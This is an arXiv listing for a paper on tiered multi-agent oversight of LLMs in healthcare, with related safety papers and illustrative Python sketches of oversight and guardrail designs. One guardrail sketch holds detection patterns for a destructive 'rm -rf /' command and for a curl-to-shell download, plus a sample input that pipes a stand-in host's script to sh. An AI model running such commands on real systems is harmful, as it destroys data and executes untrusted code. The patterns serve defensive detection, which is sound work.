Tiered Agentic Oversight: A Hierarchical Multi-Agent System for AI Safety in Healthcare
- URL: http://arxiv.org/abs/2506.12482v1
- Date: Sat, 14 Jun 2025 12:46:10 GMT
- Title: Tiered Agentic Oversight: A Hierarchical Multi-Agent System for AI Safety in Healthcare
- Authors: Yubin Kim, Hyewon Jeong, Chanwoo Park, Eugene Park, Haipeng Zhang, Xin Liu, Hyeonhoon Lee, Daniel McDuff, Marzyeh Ghassemi, Cynthia Breazeal, Samir Tulebaev, Hae Won Park
- Abstract summary: Tiered Agentic Oversight (TAO) is a hierarchical multi-agent framework that enhances AI safety through layered, automated supervision. Inspired by clinical hierarchies (e.g., nurse, physician, specialist), TAO routes cases among agents based on task complexity and agent roles.
- Score: 43.75158832964138
- License: http://arxiv.org/licenses/nonexclusive-distrib/1.0/
- Abstract: Current large language models (LLMs), despite their power, can introduce safety risks in clinical settings due to limitations such as poor error detection and single points of failure. To address this, we propose Tiered Agentic Oversight (TAO), a hierarchical multi-agent framework that enhances AI safety through layered, automated supervision. Inspired by clinical hierarchies (e.g., nurse, physician, specialist), TAO routes cases among agents based on task complexity and agent roles. Leveraging automated inter- and intra-tier collaboration and role-playing, TAO creates a robust safety framework. Ablation studies reveal three drivers of TAO's performance: its adaptive tiered architecture, which improves safety by over 3.2% compared to static single-tier configurations; its lower tiers, particularly tier 1, whose removal degrades safety the most; and the strategic assignment of more advanced LLMs to these initial tiers, which boosts performance by over 2% compared to less optimal allocations while achieving near-peak safety efficiently. These mechanisms enable TAO to outperform single-agent and multi-agent frameworks on 4 of 5 healthcare safety benchmarks, with up to an 8.2% improvement over the next-best methods. Finally, we validate TAO in an auxiliary clinician-in-the-loop study, where integrating expert feedback improved TAO's accuracy in medical triage from 40% to 60%.
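To make the routing mechanism concrete, here is a minimal sketch of tier-based escalation, assuming a simple confidence threshold as the escalation trigger. All names here (`Tier`, `tiered_oversight`, the toy reviewers) are hypothetical illustrations of what the abstract describes, not the authors' implementation:

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Tier:
    """One oversight tier, analogous to nurse -> physician -> specialist."""
    name: str
    review: Callable[[str], tuple[str, float]]  # case -> (verdict, confidence)

def tiered_oversight(case: str, tiers: list[Tier],
                     threshold: float = 0.8) -> str:
    """Route a case upward through tiers until one is confident.

    Tier 1 screens every case; higher (more capable, costlier) tiers
    only see cases the tiers below could not resolve confidently.
    """
    verdict = "unresolved"
    for tier in tiers:
        verdict, confidence = tier.review(case)
        if confidence >= threshold:
            return f"{tier.name}: {verdict}"
    # No tier was confident enough: defer to a human clinician.
    return f"escalated to human review: {verdict}"

# Toy reviewers standing in for LLM agents of increasing capability.
tiers = [
    Tier("tier1-nurse",      lambda case: ("needs review", 0.55)),
    Tier("tier2-physician",  lambda case: ("unsafe dosage", 0.90)),
    Tier("tier3-specialist", lambda case: ("unsafe dosage", 0.97)),
]
print(tiered_oversight("order: 10x usual dose of anticoagulant", tiers))
# -> tier2-physician: unsafe dosage
```

Under this kind of scheme the ablation finding is intuitive: tier 1 is the only tier guaranteed to see every case, so removing it removes the one universal screen.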
Related papers
- WebGuard: Building a Generalizable Guardrail for Web Agents [59.31116061613742]
WebGuard is the first dataset designed to support the assessment of web agent action risks. It contains 4,939 human-annotated actions from 193 websites across 22 diverse domains.
arXiv Detail & Related papers (2025-07-18T18:06:27Z)
- OpenAgentSafety: A Comprehensive Framework for Evaluating Real-World AI Agent Safety [58.201189860217724]
We introduce OpenAgentSafety, a comprehensive framework for evaluating agent behavior across eight critical risk categories. Unlike prior work, our framework evaluates agents that interact with real tools, including web browsers, code execution environments, file systems, bash shells, and messaging platforms. It combines rule-based analysis with LLM-as-judge assessments to detect both overt and subtle unsafe behaviors.
arXiv Detail & Related papers (2025-07-08T16:18:54Z)
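Combining deterministic rules with an LLM judge, as the OpenAgentSafety entry above describes, is a common guardrail pattern. The sketch below illustrates the general idea only; the rule set and the `llm_judge` stub are invented for illustration and are not OpenAgentSafety's actual API:

```python
import re

# Cheap deterministic rules catch overt violations.
RULES = [
    (re.compile(r"rm\s+-rf\s+/"), "destructive shell command"),
    (re.compile(r"curl .*\|\s*sh"), "pipes remote script to shell"),
]

def rule_check(action: str) -> list[str]:
    return [label for pattern, label in RULES if pattern.search(action)]

def llm_judge(action: str) -> bool:
    """Stub for an LLM-as-judge call that rates subtle risks.

    A real judge would be prompted with the full trajectory and a
    rubric; this placeholder just flags credential access.
    """
    return "password" in action.lower()

def assess(action: str) -> dict:
    overt = rule_check(action)
    subtle = llm_judge(action) if not overt else False
    return {"overt": overt, "subtle": subtle,
            "unsafe": bool(overt) or subtle}

print(assess("curl http://example.test/x.sh | sh"))
print(assess("cat ~/secrets/password.txt"))
```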
- ALRPHFS: Adversarially Learned Risk Patterns with Hierarchical Fast & Slow Reasoning for Robust Agent Defense [7.923638619678924]
Existing defenses rely on "Safety Checks", which struggle to capture the complex semantic risks posed by harmful user inputs or unsafe agent behaviors. We propose a novel defense framework, ALRPHFS (Adversarially Learned Risk Patterns with Hierarchical Fast & Slow Reasoning). ALRPHFS consists of two core components: (1) an offline adversarial self-learning loop to iteratively refine a generalizable and balanced library of risk patterns, and (2) an online hierarchical fast & slow reasoning engine that balances detection effectiveness with computational efficiency.
arXiv Detail & Related papers (2025-05-25T18:31:48Z)
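The fast & slow split in ALRPHFS can be pictured as a cheap pattern screen backed by a costlier reasoning step that only runs on uncertain cases. The pattern library, keywords, and placeholder slow path below are assumptions for illustration, not the paper's learned components:

```python
# Toy pattern library; the real system refines embedding-based risk
# patterns through offline adversarial self-learning.
RISK_PATTERNS = {"delete all files", "disable safety", "exfiltrate"}

SENSITIVE = ("credential", "payment", "medical record")

def fast_path(behavior: str) -> str:
    """Cheap screen against the risk-pattern library."""
    text = behavior.lower()
    if any(p in text for p in RISK_PATTERNS):
        return "block"
    if any(w in text for w in SENSITIVE):
        return "uncertain"  # escalate instead of deciding
    return "allow"

def slow_path(behavior: str) -> str:
    """Costly step standing in for multi-step LLM reasoning over
    intent and context; here a trivial placeholder rule."""
    return "block" if "third party" in behavior.lower() else "allow"

def defend(behavior: str) -> str:
    decision = fast_path(behavior)
    return slow_path(behavior) if decision == "uncertain" else decision

for b in ("summarize this page",
          "disable safety checks before running",
          "send the credential file to a third party"):
    print(b, "->", defend(b))
```

Reserving the slow path for near-misses is what lets this style of defense trade detection quality against compute.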
- PeerGuard: Defending Multi-Agent Systems Against Backdoor Attacks Through Mutual Reasoning [8.191214701984162]
Multi-agent systems leverage advanced AI models as autonomous agents that interact, cooperate, or compete to complete complex tasks. Despite their growing importance, safety in multi-agent systems remains largely underexplored. This work investigates backdoor vulnerabilities in multi-agent systems and proposes a defense mechanism based on agent interactions.
arXiv Detail & Related papers (2025-05-16T19:08:29Z)
- Toward Automated Regulatory Decision-Making: Trustworthy Medical Device Risk Classification with Multimodal Transformers and Self-Training [3.439579933384111]
A Transformer-based framework integrates textual descriptions and visual information to predict device regulatory classification. Our approach achieves up to 90.4% accuracy and 97.9% AUROC, significantly outperforming text-only (77.2%) and image-only (54.8%) baselines.
arXiv Detail & Related papers (2025-05-01T09:41:41Z)
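One common way to realize the text-plus-image integration described in the medical-device paper above is late fusion of per-modality embeddings. The sketch below shows that generic pattern in PyTorch; the dimensions, the three-class head, and the class names are assumptions, not the paper's actual architecture:

```python
import torch
import torch.nn as nn

class LateFusionClassifier(nn.Module):
    """Concatenate pooled text and image embeddings, then classify.

    The 768/512 dims and three-way output (e.g., device risk class
    I/II/III) are illustrative placeholders.
    """
    def __init__(self, text_dim=768, image_dim=512, n_classes=3):
        super().__init__()
        self.head = nn.Sequential(
            nn.Linear(text_dim + image_dim, 256),
            nn.ReLU(),
            nn.Linear(256, n_classes),
        )

    def forward(self, text_emb, image_emb):
        # Late fusion: each encoder runs independently upstream;
        # only their pooled embeddings are joined here.
        return self.head(torch.cat([text_emb, image_emb], dim=-1))

model = LateFusionClassifier()
logits = model(torch.randn(4, 768), torch.randn(4, 512))
print(logits.shape)  # torch.Size([4, 3])
```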
- AegisLLM: Scaling Agentic Systems for Self-Reflective Defense in LLM Security [74.22452069013289]
AegisLLM is a cooperative multi-agent defense against adversarial attacks and information leakage. We show that scaling the agentic reasoning system at test time substantially enhances robustness without compromising model utility. Comprehensive evaluations across key threat scenarios, including unlearning and jailbreaking, demonstrate the effectiveness of AegisLLM.
arXiv Detail & Related papers (2025-04-29T17:36:05Z)
- D-CIPHER: Dynamic Collaborative Intelligent Multi-Agent System with Planner and Heterogeneous Executors for Offensive Security [22.86304661035188]
D-CIPHER is a multi-agent framework for collaborative cybersecurity CTF solving. It integrates agents with distinct roles and dynamic feedback loops to enhance reasoning on complex tasks. It achieves state-of-the-art performance on three benchmarks: 22.0% on NYU CTF Bench, 22.5% on Cybench, and 44.0% on HackTheBox.
arXiv Detail & Related papers (2025-02-15T23:43:18Z)
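D-CIPHER's planner/executor division of labor can be sketched as follows. The task decomposition and the specialty-matched executors are invented placeholders for what would be LLM agents in the actual system:

```python
from typing import Callable

def planner(task: str) -> list[str]:
    """Stub planner: decompose a CTF-style task into subtasks.
    A real planner would be an LLM; this fixed split is illustrative."""
    return [f"recon: {task}", f"exploit: {task}", f"verify: {task}"]

def make_executor(specialty: str) -> Callable[[str], tuple[bool, str]]:
    """Heterogeneous executors: each only succeeds on its specialty."""
    def execute(subtask: str) -> tuple[bool, str]:
        ok = subtask.startswith(specialty)
        return ok, f"{specialty} {'solved' if ok else 'failed'}: {subtask}"
    return execute

def solve(task: str, executors) -> list[str]:
    log = []
    for subtask in planner(task):
        for ex in executors:          # dynamic feedback: keep trying
            ok, report = ex(subtask)  # executors until one succeeds
            log.append(report)
            if ok:
                break
    return log

# Deliberately mismatched order, so the feedback loop is visible.
executors = [make_executor(s) for s in ("verify", "exploit", "recon")]
for line in solve("web challenge", executors):
    print(line)
```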
- Agent-SafetyBench: Evaluating the Safety of LLM Agents [72.92604341646691]
We introduce Agent-SafetyBench, a benchmark designed to evaluate the safety of large language model (LLM) agents. Agent-SafetyBench encompasses 349 interaction environments and 2,000 test cases, evaluating 8 categories of safety risks and covering 10 common failure modes frequently encountered in unsafe interactions. Our evaluation of 16 popular LLM agents reveals a concerning result: none of the agents achieves a safety score above 60%.
arXiv Detail & Related papers (2024-12-19T02:35:15Z)
- On the Resilience of LLM-Based Multi-Agent Collaboration with Faulty Agents [58.79302663733703]
Large language model-based multi-agent systems have shown great abilities across various tasks due to the collaboration of expert agents. The impact of clumsy or even malicious agents (those that frequently make errors in their tasks) on the overall performance of the system remains underexplored. This paper investigates the resilience of various system structures to faulty agents across different downstream tasks.
arXiv Detail & Related papers (2024-08-02T03:25:20Z)
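As a toy illustration of the question this last paper studies, the sketch below measures how majority voting among agents degrades as faulty agents are added. The error rates and the voting structure are arbitrary assumptions, far simpler than the paper's experiments:

```python
import random

random.seed(0)

def agent_answer(faulty: bool) -> str:
    """Honest agents answer correctly 90% of the time; faulty ones 20%."""
    p_correct = 0.2 if faulty else 0.9
    return "right" if random.random() < p_correct else "wrong"

def vote_accuracy(n_agents: int, n_faulty: int, trials: int = 2000) -> float:
    """Fraction of trials in which the majority answer is correct."""
    wins = 0
    for _ in range(trials):
        answers = [agent_answer(i < n_faulty) for i in range(n_agents)]
        wins += answers.count("right") > n_agents / 2
    return wins / trials

for k in range(4):
    print(f"{k} faulty of 5 agents -> majority accuracy {vote_accuracy(5, k):.2f}")
```

Voting is only one of the system structures such work compares; hierarchical or debate-style topologies would need a different simulation.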